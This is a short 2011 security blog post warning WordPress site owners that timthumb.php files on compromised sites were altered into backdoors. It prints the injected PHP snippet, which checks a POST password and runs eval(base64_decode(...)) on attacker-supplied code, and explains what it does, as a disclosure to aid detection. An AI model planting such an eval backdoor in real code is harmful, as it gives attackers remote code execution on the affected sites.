• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

TimThumb.php backdoor

September 14, 2011David Dede

FacebookTwitterSubscribe

If your site got compromised lately with the TimThumb.php vulnerability, make sure to check that script to see if it was not modified to act as a backdoor as well.

We are seeing in many sites the timthumb.php with the following code added to it:

if (md5 (md5($_POST[‘p’]))===’xxx8ab2ab.. a4ec61072xxx’)
die (eval ( base64_decode ($_POST[‘c’])));

If you are not sure what this code does, it receives a password via the “p” POST and if it is correct, it executes any PHP code sent by the attackers in the “c” POST variable.
For more information about backdoors, we did a nice post about them: ASK Sucuri: What about the backdoors?

FacebookTwitterSubscribe

Categories: Vulnerability Disclosure, Website Malware Infections, WordPress SecurityTags: Hacked Websites, Malware Updates, Sucuri WordPress Plugin, Website Backdoor

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.